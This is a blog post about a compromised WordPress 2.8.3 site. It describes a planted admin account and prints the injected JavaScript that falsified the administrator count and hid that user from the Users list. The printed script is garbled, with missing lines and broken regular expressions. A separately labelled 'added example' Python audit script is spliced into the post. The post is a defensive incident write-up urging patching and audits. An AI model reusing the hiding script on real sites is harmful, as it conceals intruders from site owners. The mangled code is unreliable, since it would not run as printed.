WordPress Security Concern

I’m not sure if you’ve applied the latest updates for WordPress, but I did last week. However, it appears that someone got into one of the blogs that I manage and created an account for themselves. They didn’t do anything with it, but they DID have full admin access. I’m assuming that this was due to a security bug in 2.8.3, as they were in when that was on the server.

So patch your servers if you haven’t already!

Here’s how I noticed that the person had gotten in. I was doing an audit of the users on the site and noticed that the count next to Administrators stated that there were 3 Admins for the site. However, when I viewed the list, there were only 2 on the page. Taking a look in the database, I noticed a user with a goofy name as an admin. And peeking in the wp_usermeta table, I noticed the following attribute was assigned to their firstname:

        for (var i = 0; i < tags.length; i++) {
            var t = tags[i].innerHTML;
            var h = tags[i];
            if (t.indexOf(s) > 0) {
                s = (parseInt(t) - 1) + s;
                h.removeChild(h.firstChild);
                t = document.createTextNode(s);
                h.appendChild(t);
            }
        }
        var arr = document.getElementsByTagName("ul");
        for (var i in arr) if (arr[i].className == "subsubsub") {
            var n = />Administrator ((d+))
            if (n[1] > 0) {
                var txt = arr[i].innerHTML.replace(/>Administrator ((d+))Administrator (" + (n[1] - 1) + ")<");
                arr[i].innerHTML = txt;
            }
        }
    } catch (e) {};
};
addLoadEvent(setUserName);

It’s not formatted the greatest, but basically, it hides the username from the list. Nice, eh! Simply deleting this entry made the user show up in the user list, where I was able to do some auditing before blowing away the user.
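The same audit can be done against the database rows rather than the admin screen, which is what the injected script tampers with. The script below is an added example and is not code from the original post: it takes constructed rows in the shape of wp_users and wp_usermeta (the table names, the sample user ids and logins, and the sample meta values are all assumptions), lists every user whose capabilities meta grants the administrator role, and flags any meta value that carries script fragments like the one above. Note that wp_capabilities is stored as a PHP-serialized array, so the role names are pulled out of that serialized form.

```python
"""Audit WordPress user rows for hidden administrators (added example).

Works on rows you have already pulled from the database, e.g.
  SELECT user_id, meta_key, meta_value FROM wp_usermeta;
  SELECT ID, user_login FROM wp_users;
Here the rows are constructed inline so the script runs offline.
"""
import re

# Constructed sample rows in the shape of wp_users: {ID: user_login}.
SAMPLE_USERS = {1: "matt", 2: "jane", 7: "xq9_zz"}

# Constructed sample rows in the shape of wp_usermeta:
# (user_id, meta_key, meta_value). User 7 is the planted admin whose
# first_name carries a script, mirroring the post. The snippet in that
# value is a placeholder, not the real payload.
SAMPLE_USERMETA = [
    (1, "wp_capabilities", 'a:1:{s:13:"administrator";b:1;}'),
    (1, "first_name", "Matt"),
    (2, "wp_capabilities", 'a:1:{s:6:"editor";b:1;}'),
    (2, "first_name", "Jane"),
    (7, "wp_capabilities", 'a:1:{s:13:"administrator";b:1;}'),
    (7, "first_name", '<script>function setUserName(){}addLoadEvent(setUserName);</script>'),
]

# Matches each role set to true inside the PHP-serialized capabilities
# array, e.g. s:13:"administrator";b:1;  ->  administrator
ROLE_RE = re.compile(r's:\d+:"([^"]+)";b:1;')

# Fragments that have no business in a name or profile field.
SCRIPT_RE = re.compile(r"<\s*script|javascript:|addLoadEvent", re.IGNORECASE)


def roles_from_capabilities(serialized):
    """Return the role names granted (set to true) in a wp_capabilities value."""
    return ROLE_RE.findall(serialized)


def audit(users, usermeta):
    """Return (admin_logins, flagged) for the given rows.

    admin_logins: sorted list of user_login values holding the administrator
                  role according to the database, regardless of what the
                  admin screen displays.
    flagged:      list of (user_login, meta_key) whose meta_value contains
                  script fragments.
    """
    admin_ids = set()
    flagged = []
    for uid, key, value in usermeta:
        # The meta_key is '<table_prefix>capabilities'; the prefix is usually
        # 'wp_' but may differ, so match on the suffix only.
        if key.endswith("capabilities") and "administrator" in roles_from_capabilities(value):
            admin_ids.add(uid)
        if SCRIPT_RE.search(value):
            flagged.append((users.get(uid, "<unknown id %d>" % uid), key))
    admin_logins = sorted(users.get(uid, "<unknown id %d>" % uid) for uid in admin_ids)
    return admin_logins, flagged


def admin_count(users, usermeta):
    """Number of administrators in the database; compare it with the count
    shown on the Users screen, which the injected script rewrites."""
    return len(audit(users, usermeta)[0])


if __name__ == "__main__":
    admins, suspicious = audit(SAMPLE_USERS, SAMPLE_USERMETA)
    print("administrators in database (%d): %s" % (len(admins), ", ".join(admins)))
    for login, key in suspicious:
        print("script fragment in usermeta: user=%s meta_key=%s" % (login, key))
```

If the number printed here is larger than the number the Users screen shows, something in the page is hiding a row, and the flagged meta rows are the first place to look.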

So audit your admin list and patch your servers! This could have been a lot worse if they had started defacing the site or hiding other gems on there.

-Matt